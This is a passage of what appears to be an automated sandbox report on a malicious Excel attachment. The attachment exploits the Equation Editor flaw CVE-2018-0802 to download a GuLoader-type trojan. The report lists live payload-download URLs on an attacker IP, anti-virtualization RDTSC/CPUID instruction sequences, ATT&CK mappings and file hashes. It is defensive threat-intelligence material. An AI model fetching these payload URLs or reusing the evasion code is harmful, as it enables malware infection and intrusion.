                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: MTIR21487610_0062180102_20210714081247.PDF.xlsxStream path 'EncryptedPackage' entropy: 7.99875082678 (max. 8.0)

                Malware Analysis System Evasion:

                barindex
                Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E7036
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E100E
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E4071
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E2958
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E42CD
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E1B1A
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E1B5F
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E43F1
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E341B
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E7D52
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E0EFE
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E0FB5
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E6F9E
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E2793
                Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:
                Tries to detect virtualization through RDTSC time measurementsShow sources
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E54E7 rdtsc
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740Thread sleep time: -240000s >= -30000s
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740Thread sleep time: -60000s >= -30000s
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E54E7 rdtsc
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E50CA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E2958 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E71A9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E6B93 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E341B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E7D52 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E2183 cpuid
                Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery41Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery313VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                Behavior Graph

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                MTIR21487610_0062180102_20210714081247.PDF.xlsx28%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe42%VirustotalBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe14%MetadefenderBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe31%ReversingLabsWin32.Trojan.Vebzenpak
                C:\Users\Public\vbc.exe42%VirustotalBrowse
                C:\Users\Public\vbc.exe14%MetadefenderBrowse
                C:\Users\Public\vbc.exe31%ReversingLabsWin32.Trojan.Vebzenpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://ceattire.com/bin_UYDMbHwI28.bin0%Avira URL Cloudsafe
                http://180.214.239.39/cpu/.svchost.exe0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://ceattire.com/bin_UYDMbHwI28.bintrue
                • Avira URL Cloud: safe
                unknown
                http://180.214.239.39/cpu/.svchost.exetrue
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.day.com/dam/1.0300F3110.emf.0.drfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  180.214.239.39
                  unknownViet Nam
                  135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

                  General Information

                  Joe Sandbox Version:33.0.0 White Diamond
                  Analysis ID:449166
                  Start date:15.07.2021
                  Start time:11:05:26
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 37s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:MTIR21487610_0062180102_20210714081247.PDF.xlsx
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:5
                  Number of new started drivers analysed:2
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winXLSX@4/11@0/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 53%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
                  • TCP Packets have been reduced to 100
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  11:06:04API Interceptor71x Sleep call for process: EQNEDT32.EXE modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  180.214.239.39Booking Confirmation.xlsxGet hashmaliciousBrowse
                  • 180.214.239.39/port/.svchost.exe
                  6306093940.xlsxGet hashmaliciousBrowse
                  • 180.214.239.39/ssh/.svchost.exe
                  6306093940.xlsxGet hashmaliciousBrowse
                  • 180.214.239.39/mssn/.svchost.exe

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNBooking Confirmation.xlsxGet hashmaliciousBrowse
                  • 180.214.239.39
                  kung.xlsxGet hashmaliciousBrowse
                  • 103.140.250.43
                  TT PAYMENT CONFIRMATION.xlsxGet hashmaliciousBrowse
                  • 103.89.90.94
                  lokibot.docxGet hashmaliciousBrowse
                  • 103.133.106.144
                  payment advice.exeGet hashmaliciousBrowse
                  • 103.89.91.38
                  PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                  • 103.140.250.43
                  INVM220210055600512.xlsxGet hashmaliciousBrowse
                  • 103.89.90.94
                  xP0clPWhrv.exeGet hashmaliciousBrowse
                  • 103.133.106.117
                  Doc1892071321.exeGet hashmaliciousBrowse
                  • 103.133.104.146
                  http___103.89.90.94_suket_wininit.exeGet hashmaliciousBrowse
                  • 103.89.90.94
                  DOC.1000000567.267805032019.doc__.rtfGet hashmaliciousBrowse
                  • 103.133.106.117
                  shipping quote.xlsxGet hashmaliciousBrowse
                  • 103.140.250.43
                  INVM220210055600512.xlsxGet hashmaliciousBrowse
                  • 103.89.90.94
                  NEW ORDER.xlsxGet hashmaliciousBrowse
                  • 103.140.250.43
                  OUTSTANDING SOA.xlsxGet hashmaliciousBrowse
                  • 103.145.253.94
                  6306093940.xlsxGet hashmaliciousBrowse
                  • 180.214.239.39
                  INVM220210055600512.xlsxGet hashmaliciousBrowse
                  • 103.89.90.94
                  pXL06trbQ2.exeGet hashmaliciousBrowse
                  • 103.133.106.117
                  DOO STILO NOVI SAD EUR 5.200,99 20210705094119.docGet hashmaliciousBrowse
                  • 103.133.106.117
                  11.xlsxGet hashmaliciousBrowse
                  • 103.140.250.43

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeBooking Confirmation.xlsxGet hashmaliciousBrowse
                    C:\Users\Public\vbc.exeBooking Confirmation.xlsxGet hashmaliciousBrowse

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:downloaded
                      Size (bytes):267376
                      Entropy (8bit):4.7769054763067915
                      Encrypted:false
                      SSDEEP:1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
                      MD5:FCFB0EC70F1419EDE8A534CC95CB61E9
                      SHA1:D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA
                      SHA-256:FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
                      SHA-512:FFEC36B157F889A2BD351B9D8423B247138A5FD2E57DE83BB1253336518431136A265D244B653AF470A8D04E2674C4CADF467C065A7FC38F10EFFEDD705AB248
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, Author: Joe Security
                      Antivirus:
                      • Antivirus: Virustotal, Detection: 42%, Browse
                      • Antivirus: Metadefender, Detection: 14%, Browse
                      • Antivirus: ReversingLabs, Detection: 31%
                      Joe Sandbox View:
                      • Filename: Booking Confirmation.xlsx, Detection: malicious, Browse
                      Reputation:low
                      IE Cache URL:http://180.214.239.39/cpu/.svchost.exe
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....FR.................`..........p........p....@..........................................................................d..(........z..........X............... .......................................(... ....................................text...0Y.......`.................. ..`.data........p.......p..............@....rsrc....z..........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B2651CA.jpeg
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                      Category:dropped
                      Size (bytes):62140
                      Entropy (8bit):7.529847875703774
                      Encrypted:false
                      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                      MD5:722C1BE1697CFCEAE7BDEFB463265578
                      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\300F3110.emf
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                      Category:dropped
                      Size (bytes):648132
                      Entropy (8bit):2.8121852211833085
                      Encrypted:false
                      SSDEEP:3072:I34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:y4UcLe0JOcXuunhqcS
                      MD5:DDF289FE9FBEE88B186842F4CA188ABC
                      SHA1:D15B3CE044EA211660351020692DA491E83C1480
                      SHA-256:96A9A2298922548EA172E06B5945D134D0937502B85C2461A1F4DD211FB815D7
                      SHA-512:6C8B7DCB7B91DD41F9EEA3E2BB1F963161B450FE8C0FF4A00D0FF91DF11302073087D36AB2B7422225FB86709C468684AC25B00717216F279EC904B7AB1BDF07
                      Malicious:false
                      Reputation:low
                      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................P$...0./..f.P.@V.%...../.P./......./.4./.RQ.Q../.../......./.../.$Q.Q../.../. ...Id.P../.../. ............d.P........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........@./.X...../.../..8.P........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48E1DDD1.emf
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                      Category:dropped
                      Size (bytes):7608
                      Entropy (8bit):5.076880855619051
                      Encrypted:false
                      SSDEEP:96:+SHfCsL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5KcjU+H3tWa6WdTfOYLpR8d
                      MD5:55187CB63A1502A53DFF777D0ED28018
                      SHA1:9C1CD11BEC1ACADE219D95701D4906DF54719DEC
                      SHA-256:533B9EF863D579278C5903883DD56C133585D35D011492158E9CC474165B984B
                      SHA-512:33741FFD87CE2E83E23CF26AE52E3A5AB69F5E7CE317E88326E13A4ADF18EC1BE7329AEF3EABB35AB5ED91C3F4FA83483F97B579D44EEB6548BFA935291EF394
                      Malicious:false
                      Reputation:low
                      Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................5.6.).X.......d.......................@...'.q....\..................W.q.........6.v_.q......q.k5.Dy.wX.................w....$.......d.......$...J^.q.... ^.q0..X...m......-.......<.w................<..v.Zkv....X.zT.....k5.......................lvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B42899E.jpeg
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                      Category:dropped
                      Size (bytes):85020
                      Entropy (8bit):7.2472785111025875
                      Encrypted:false
                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\750B075C.png
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                      Category:dropped
                      Size (bytes):94963
                      Entropy (8bit):7.9700481154985985
                      Encrypted:false
                      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                      MD5:17EC925977BED2836071429D7B476809
                      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                      Malicious:false
                      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95A3F107.jpeg
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                      Category:dropped
                      Size (bytes):62140
                      Entropy (8bit):7.529847875703774
                      Encrypted:false
                      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                      MD5:722C1BE1697CFCEAE7BDEFB463265578
                      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                      Malicious:false
                      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A242A343.png
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                      Category:dropped
                      Size (bytes):94963
                      Entropy (8bit):7.9700481154985985
                      Encrypted:false
                      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                      MD5:17EC925977BED2836071429D7B476809
                      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                      Malicious:false
